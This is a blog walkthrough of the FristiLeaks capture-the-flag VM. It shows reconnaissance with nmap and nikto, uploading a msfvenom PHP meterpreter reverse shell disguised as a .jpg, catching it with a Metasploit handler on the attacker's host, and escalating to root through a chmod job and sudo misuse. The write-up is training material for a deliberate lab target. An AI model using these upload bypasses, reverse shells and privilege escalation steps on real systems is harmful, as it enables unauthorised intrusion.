Hack the Fristileaks VM (CTF Challenge)

Today we will walk through the FristiLeaks VM. There is nothing that we know about this VM except for the fact that security level is from beginner to intermediate. Also this VM only works on 08:00:27:A5:A6:76 MAC address or else it will not work.
WalkThrough
We will as always start with finding our target.

netdiscover


Our target is 192.168.0.101. Now scan the target with nmap script.
nmap -p- -A 192.168.0.101


As a result it shows us that port 80 is open. Therefore lets open it in browser.


There is nothing on the page and the page source that prooves to be useful. So we used nikto to check it thoroughly and we found three directories i.e. /sisi , /cola , /beer. Three of these directories showed the following image:

In this page too there was nothing in the page source; also there was no metadata behind the image. And it occurred to me that fristi is also a drink like cola or beer or sisi and also there was reference to it on the home page so there is possibility that fristi is also a directory here. And there was no harm in trying it.


And the result was successful as we found admin portal with an image. Let’s look into its source page.


In the source page you will find a very different code as shown above. Copy this code and then right click on the image and select Inspect element (Q).


After clicking on the option a tab will open.


Select the longer code and paste the one here which you previously copied.


Once the code is pasted you will observe that the image is gone but some text appears. This text can be password. And if you remember the source code page there was a word eezeepz which can be our username. You can see it in the image below.


Enter the username and password and log in to it.


Once you log in you will find a page where you can upload something. So, here we will upload our malicious file. And to make it go to your terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 –f raw


Copy the code from to die(); and save it in a text file with a .php extension. But when you try to upload it then there will be some error so just change the extension to .jpg and upload it.


Once the file is uploaded, type 192.168.0.101/fristi/uploads/shell.php.jpg in the browser to run it.


As the said is done, you will get a meterpreter session. And to get this session type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit

As the session is received type shell to go to the shell and then run the set of folowing commands to reach the terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py


Then go to /www folder by typing:
cd www
ls –al (this command helps us see the list of files or folders)
Here we found a notes.txt. Lets read.
cat notes.txt


In notes.txt there a message from jerry who is hinting us to go in the home directory. Let’s try and do that by typing:
cd /home
ls –la
Here you will find list of all the usernames. If you try to enter any folder it says permission denied except for the eezeepz one. So type the following to go into it:
cd eezeepz


Once you enter eezeepz folder you will again find a notes.txt. Read it.
cat notes.txt


Again in the notes.txt there is message from jerry telling us what to do. So let’s follow his steps by typing:
Echo “/usr/bin/../../bin/chmod –R 777 /home/admin” > /tmp/runthis
After typing the command go back to home folder and from there go into the admin directory.
cd /home
ls –la
cd /admin
ls -la


In the admin directory you will find three important files i.e. cryptedpass.txt, cryptpass.py, whoisyougodnow.txt. Read these files one by one:

cat whoisyourgodnow.txt
cat cryptedpass.txt
cat cryptpass.py


Two of them will show some data in base 64 coded form. Now these can be passwords. Decode it and it will give you the word LetThereBeFristi!
Now switch users by typing:
su fristigod
Band then give password when asked i.e. LetThereBeFristi!
Then to check the id type:
id
And to check the list of files type;
ls -la


Now go to var and check what files it has and for that type :
cd /var
ls –la
You will find a folder called fristigod, to enter it and see the directories type :
cd fristigod
ls -la


In here you wil find a directory .bash_history. It contains all the commands that were previously used by admin. Let’s read it.
cat .bash_history


We will try one of them that is:
sudo –l
And give the password when required.


Now to reach the flag follow the combination of following steps :
sudo –u fristi .secret_admin_stuff/docom /bin/sh
id
cd /root
ls –la
cat fristileaks_secrets.txt


And VOILA!!! You have extracted the flag. Congratulations. 

0 comments:

Post a Comment